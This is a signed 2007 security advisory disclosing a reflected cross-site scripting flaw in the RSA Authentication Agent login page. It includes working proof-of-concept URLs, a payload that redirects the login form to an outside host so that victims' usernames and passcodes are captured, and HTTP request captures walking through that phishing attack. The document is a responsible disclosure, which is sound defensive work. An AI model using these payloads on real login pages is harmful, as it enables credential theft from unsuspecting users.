ProCheckUp Security Advisory 2007.44

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
PR07-44: XSS on RSA Authentication Agent login page  
  
Vulnerability found: 5th December 2007  
  
Vendor informed: 13th December 2007  
  
Severity: Medium-high  
  
Successfully tested on: RSA Authentication Agent 5.3.0.258 for Web for  
Internet Information Services  
  
  
Description:  
  
RSA Authentication Agent is vulnerable to a vanilla XSS on the login page.  
  
Vulnerable server-side script: '/WebID/IISWebAgentIF.dll'  
  
Unfiltered parameter: 'postdata'  
  
  
Notes:  
  
It is believed that this vulnerability was originally reported in 2005  
(BID 13168). However, In the original report, only version 5.2 of the  
Authentication Agent was mentioned to be vulnerable. Additionally,  
nothing was said regarding the possibility of exploiting this XSS as a  
GET request (as opposed to POST). Therefore, the vulnerability can be  
exploited via a malicious URL, since visiting a URL results in the web  
browser submitting a GET request. Since the XSS condition occurs on the  
login page, the bug is highly suitable for advanced XSS phishing attacks  
as illustrated in the proof of concept below. Please note that this is  
issue is different from CAN-2003-0389 and CVE-2005-3329.  
  
  
Simple XSS Proof of Concept (PoC) URLs:  
  
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22&authntype=2&username=test&passcode=test  
  
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22  
  
  
The injected payload in the previous examples is:  
"><script>alert("XSS")</script><a b="  
  
The following specially-crafted URL performs an advanced XSS phishing  
attack. After the victim enters his/her username and passcode, the  
credentials are forwarded to a third-party site (procheckup.com in this  
case) and logged by the attacker:  
  
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22&authntype=2&username=anyvaluehere&passcode=anyvaluehere  
  
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22  
  
  
The injected payload in the previous examples is:  
"><script>document.forms[0].action="http://procheckup.com?"</script><a b="  
  
  
Consequences:  
  
An attacker may be able to cause execution of malicious scripting code  
in the browser of a victim user who clicks on a link to a RSA  
Authentication Agent login page. Such code would run within the context  
of the target domain.  
  
This type of attack can result in non-persistent defacement of the  
target site, or the redirection of confidential information (i.e.:  
session IDs or passwords) to unauthorised third parties.  
  
  
Fix:  
  
The vendor has stated that this issue was addressed in the RSA  
Authentication Agent 5.3.3.378. RSA customers can download the upgrade  
from the RSA web site.  
  
  
References:  
  
http://www.procheckup.com/Vulnerability_2007.php  
http://www.rsa.com/node.aspx?id=2807  
  
  
Credits: found by Jan Fry and Adrian Pastor - ProCheckUp Ltd  
(www.procheckup.com). ProCheckUp thanks RSA for being so cooperative and  
responding so fast.  
  
COMPLETE HTTP REQUEST for simple XSS PoC:  
  
GET  
/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22  
HTTP/1.1  
User-Agent: curl/7.15.4 (i486-pc-linux-gnu) libcurl/7.15.4  
OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.3  
Host: target-domain.foo  
Accept: */*  
  
  
PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag):  
  
HTTP/1.1 200 OK  
Connection: close  
Expires: 0  
Date: Wed, 12 Dec 2007 17:32:08 GMT  
Content-Type: text/html  
Server: Microsoft-IIS/6.0  
X-Powered-By: ASP.NET  
Pragma: no-cache  
Cache-control: no-cache,max-age=0,must-revalidate  
  
  
<HTML>  
<HEAD>  
~ <TITLE>RSA SecurID : Log In</TITLE>  
  
[ SNIP ]  
  
<INPUT TYPE=HIDDEN NAME="stage" VALUE="useridandpasscode">  
<INPUT TYPE=HIDDEN NAME="referrer" VALUE="/">  
<INPUT TYPE=HIDDEN NAME="sessionid" VALUE="0">  
<INPUT TYPE=HIDDEN NAME="postdata"  
VALUE=""><script>alert("XSS")</script><a b="">  
<INPUT TYPE=HIDDEN NAME="authntype" VALUE="2">  
  
<TABLE class="form" cellspacing="0">  
<TR>  
<TD class="label">User ID:</TD>  
<TD class="field"><INPUT TYPE=TEXT NAME="username" VALUE=""  
MAXLENGTH=32></TD>  
</TR>  
  
<TR>  
<TD class="label">Passcode:</TD>  
<TD class="field"><INPUT TYPE=PASSWORD NAME="passcode" VALUE=""  
MAXLENGTH=16><br /><span style="color: #666;">Your Passcode is your PIN  
+ the number displayed on your token (the Tokencode).</span></TD>  
</TR>  
</TABLE>  
  
</div>  
<P class="buttons">  
<INPUT TYPE=SUBMIT VALUE="Log In">  
<INPUT TYPE=RESET VALUE="Reset">  
</P>  
  
</div>  
  
</FORM>  
</div>  
</BODY>  
</HTML>  
  
  
COMPLETE ATTACK WALK-THROUGH FOR XSS PHISHING ATTACK:  
  
Step 1: Victim is tricked to click on the specially-crafted URL:  
  
HTTP Request:  
  
GET  
/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http:  
//procheckup.com?%22%3C/script%3E%3Ca%20b=%22 HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-ms-application, application/vnd.ms-xpsdocument,  
application/xaml+xml, application/x-ms-xbap,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Accept-Language: en-gb  
UA-CPU: x86  
Accept-Encoding: gzip, deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1;  
.NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)  
Host: target-domain.foo  
Connection: Keep-Alive  
  
  
Step 2: Victim fills in 'User ID' and 'Passcode' fields and clicks on  
"Log In":  
  
HTTP request - notice the victim's username and passcode are submitted  
to a third-party site (procheckup.com in this case):  
  
POST http: //procheckup.com/? HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-ms-application, application/vnd.ms-xpsdocument,  
application/xaml+xml, application/x-ms-xbap,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Accept-Language: en-gb  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
Accept-Encoding: gzip, deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1;  
.NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)  
Host: procheckup.com  
Content-Length: 116  
Proxy-Connection: Keep-Alive  
Pragma: no-cache  
Cookie: __utma=105825218.1973702853.1197971766.1197981134.1197988777.4;  
__utmz=105825218.1197971766.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);  
__utmb=105825218  
  
stage=useridandpasscode&referrer=%2F&sessionid=0&postdata=&authntype=2&username=MYUSERNAME&passcode=MYSECRETPASSWORD  
  
  
  
Legal:  
  
Copyright 2008 Procheckup Ltd. All rights reserved.  
  
Permission is granted for copying and circulating this Bulletin to the  
Internet community for the purpose of alerting them to problems, if and  
only if, the Bulletin is not edited or changed in any way, is  
attributed to Procheckup, and provided such reproduction and/or  
distribution is performed for non-commercial purposes.  
  
  
Any other use of this information is prohibited. Procheckup is not  
liable for any misuse of this information by any third party.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.6 (GNU/Linux)  
  
iD8DBQFID2tsoR/Hvsj3i8sRAjgRAKC0Lvl/ZeP+UpIV4XZA4z4Tvt7lhwCgsU2J  
K7gMj25WIPIyHr1rDsbuSAA=  
=fLsl  
-----END PGP SIGNATURE-----  
`